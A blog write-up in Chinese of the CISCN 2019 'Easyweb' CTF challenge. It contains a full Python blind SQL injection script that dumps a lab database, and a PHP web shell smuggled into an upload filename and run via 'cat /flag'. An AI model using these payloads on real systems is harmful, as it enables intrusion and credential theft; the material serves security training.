[CISCN2019 总决赛 Day2 Web1]Easyweb

写在前面

做完这道题想上网看看师傅们的绕过思路,但是发现很多都不太详细,所以这里详细写下。

考点

1.sql注入绕过。
2.文件上传利用文件名getshell。

信息搜集

打开网页。

大概浏览一下,有robots.txt,提示了Disallow: *.php.bak
想down下index.php.bak但是404,看看这幅图片的url,是image.php取得的,down下image.php.bak得到源码

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

直接看到过滤,参数加了addslashes,会转义单引号,双引号,反斜杠,null。
比如:\'=>\\\' , '=>\'那这里直接字符型注入的思路肯定是不行的。

但是往下看,我们看到一个过滤为空的php代码,一般这种情况很可能就会造成漏洞的出现。
看看这段代码:str_replace(array("\\0","%00","\\'","'"),"",$id),意思就是将$id字符串中的,\0, %00,\','这四个字符串替换为空。

那么这里就有问题了,我们知道\0经过addslashes会变成\\0,在经过str_replace的话就会变成\,没错。这样我们就能转义sql语句中后门拼接的单引号。
即输入id=\0,到了sql语句就是select * from images where id='\' or path='{$path}'

没错,现在的id就是\' or path=这一小段。
这里$path也是我们可控的这就造成了sql注入。
http://0a8c3e77-33ad-47a3-867a-13b4a1879856.node3.buuoj.cn/image.php?id=1\0&path=or 1=1%23仍然会显示图片,因为select * from images where id='\' or path='or 1=1#'这个sql语句最后的单引号被注释掉了,是恒为真的。以此思路,就造成了sql注入漏洞。

getFlag

sql注入

因为没有回显数据,只根据对错显示/不显示图片(查看源码内容有JFIF字符串),所以这里我们就可以直接盲注。(注意:不能使用单双引号,所以可以进行十六进制编码)

# 爆库
or ascii(substring(database(),%s,1))=%s #

# 爆表
or ascii(substring((select table_name from information_schema.tables where table_schema="+database+" limit %s,1),%s,1))=%s #

# 爆列
or ascii(substring((select column_name from information_schema.columns where table_name="+"'"+table_name+"'"+limit

# 爆字段
or ascii(substring((select group_concat("+",".join(column_name)+") from "+table_name+"),%s,1))=%s#

盲注脚本如下

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import urllib
import time
start_time = time.time()
def database_length(url):
    values={}
    for i in range(1,100):
        values['path'] = "or (select length(database()))=%s#" %i
        data = urllib.urlencode(values)
        geturl = url+data
        response = requests.get(geturl)
        if response.content.find('JFIF')>0:
            return i

def database_name(url):
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    values={}
    databasename= ''
    #aa = 15
    aa = database_length(url)
    print 'DatabaseLength:'  + str(aa)
    for i in range(1, aa+1):
        for payload in payloads:
            values['path'] = "or ascii(substring(database(),%s,1))=%s #" %(i,ord(payload))
            data = urllib.urlencode(values)
            geturl = url+data
            response = requests.get(geturl)
            if response.content.find('JFIF')>0:
                databasename += payload
                print 'DatabaseName: ' + databasename
                break
    return databasename



def table_count(url,database):
    values={}
    for i in range(1,100):
        values['path'] = "or (select count(table_name) from information_schema.tables where table_schema="+database+")"+"=%s#" %i
        data = urllib.urlencode(values)
        geturl = url+data
        response = requests.get(geturl)
        if response.content.find('JFIF')>0:
            return i
def table_length(url,a,database):
    values={}
    for i in range(1,100):
        values['path'] = "or (select length(table_name) from information_schema.tables where table_schema="+database+" limit %s,1)=%s#" %(a,i)
        data = urllib.urlencode(values)
        geturl = url+data
        response = requests.get(geturl)
        if response.content.find('JFIF')>0:
            return i
def table_name(url,database):
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    values={}
    table_name=[]
    bb = table_count(url,database)
    print 'TableCount:' + str(bb)
    for i in range(0,bb):
        user= ''
        cc=table_length(url,i,database)
        print 'TableLength:'  + str(cc)
        if cc==None:
            break
        for j in range(1,cc+1):
            for payload in payloads:
                values['path'] = "or ascii(substring((select table_name from information_schema.tables where table_schema="+database+" limit %s,1),%s,1))=%s #" %(i,j,ord(payload))
                data = urllib.urlencode(values)
                geturl = url+data
                response = requests.get(geturl)
                if response.content.find('JFIF')>0:
                    user += payload
                    print 'TableName'+str(i+1)+' :' + user
                    break
        table_name.append(user)
    return table_name


def column_count(url,table_name):
    values={}
    for i in range(1,100):
        values['path'] = "or (select count(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+")=%s#" %i
        data = urllib.urlencode(values)
        geturl = url+data
        response = requests.get(geturl)
        if response.content.find('JFIF')>0:
            return i
def column_length(num,url,table_name):
    values={}
    for i in range(1,100):
        limit = " limit %s,1)=%s#" %(num,i)
        values['path'] = "or (select length(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+limit
        data = urllib.urlencode(values)
        geturl = url+data
        response = requests.get(geturl)
        if response.content.find('JFIF')>0:
            return i
def column_name(url,table_name):
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    values={}
    column_name=[]
    dd=column_count(url,table_name)
    print 'ColumnCount:' + str(dd)
    for i in range(0,dd):
        user= ''
        bb=column_length(i,url,table_name)
        print 'ColumnLength:'  + str(bb)
        if bb==None:
            break
        for j in range(1,bb+1):
            for payload in payloads:
                limit=" limit %s,1),%s,1))=%s#" %(i,j,ord(payload))
                values['path'] = "or ascii(substring((select column_name from information_schema.columns where table_name="+"'"+table_name+"'"+limit
                data = urllib.urlencode(values)
                geturl = url+data
                response = requests.get(geturl)
                if response.content.find('JFIF')>0:
                    user += payload
                    print 'ColumnName'+str(i+1)+' :' + user
                    break
        column_name.append(user)
    return column_name

def content_length(url,table_name,column_name):
    values={}
    for i in range(1,100):
        values['path'] = "or (select length(group_concat("+",".join(column_name)+")) from "+table_name+")=%s#" %i
        data = urllib.urlencode(values)
        geturl = url+data
        response = requests.get(geturl)
        if response.content.find('JFIF')>0:
            return i

def all_content(url,table_name,column_name):
    payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789,|@_.-{}'
    values={}
    all_content = ''
    all_length = content_length(url,table_name,column_name)
    print 'AllContentLength:'  + str(all_length)
    for i in range(1,all_length+1):
        for payload in payloads:
            values['path'] = "or ascii(substring((select group_concat("+",".join(column_name)+") from "+table_name+"),%s,1))=%s#" %(i,ord(payload))
            data = urllib.urlencode(values)
            geturl = url+data
            response = requests.get(geturl)
            if response.content.find('JFIF')>0:
                all_content += payload
                print 'Content in '+table_name+': ' + all_content
                break
    return all_content


if __name__ == '__main__':
    url='http://fd9dbe16-e77d-43da-a6fd-64f39b23ffac.node3.buuoj.cn/image.php?id=\\0&'
    databasename=database_name(url)
    print "The current database:"+databasename


    databaseHex = '0x'+databasename.encode('hex')
    tables=table_name(url,databaseHex)
    print databasename+" have the tables:",
    print tables


    for table in tables:
        print table+" have the columns:"
        tableHex = '0x'+(table).encode('hex')
        columns = column_name(url,tableHex)
        print table+'\'s content are:' + all_content(url,table,columns)
    print 'Use: %d second' % (time.time() - start_time)

得到如下有用的信息:

数据库名:ciscnfinal
表名:images,users
列名:id,path(images); username,password(users)
用户名:admin
密码:0fbd84eb6adec0a07e9a   (随机的,不能直接用)

文件上传

登陆进来就是文件上传页面。

php扩展名无法上传,但是phtml扩展名可以上传,并且返回日志文件路径(这个日志文件是php文件)

查看日志文件,发现记录了文件名。

那么就尝试在文件名中写shell,但是这里是整个文件名都不许出现php字符串也就是无法使用<?php

我们知道php代码是可以使用短标签的<?=
那么上传文件,抓包修改文件名为<?=@system($_GET[A1oe]);?>.phtml,然后访问返回的日志文件,提交get参数A1oe即可。

访问:http://fd9dbe16-e77d-43da-a6fd-64f39b23ffac.node3.buuoj.cn/logs/upload.ff207171f341bf4ad1bacba06db8b55b.log.php?A1oe=cat%20/flag](http://fd9dbe16-e77d-43da-a6fd-64f39b23ffac.node3.buuoj.cn/logs/upload.ff207171f341bf4ad1bacba06db8b55b.log.php?A1oe=cat /flag

总结

这道题其实并不难,我比较多的时间是花在编写盲注脚本上的,都是一些常规的思路。

posted @ 2020-04-09 11:39  A1oe  阅读(375)  评论(0编辑  收藏  举报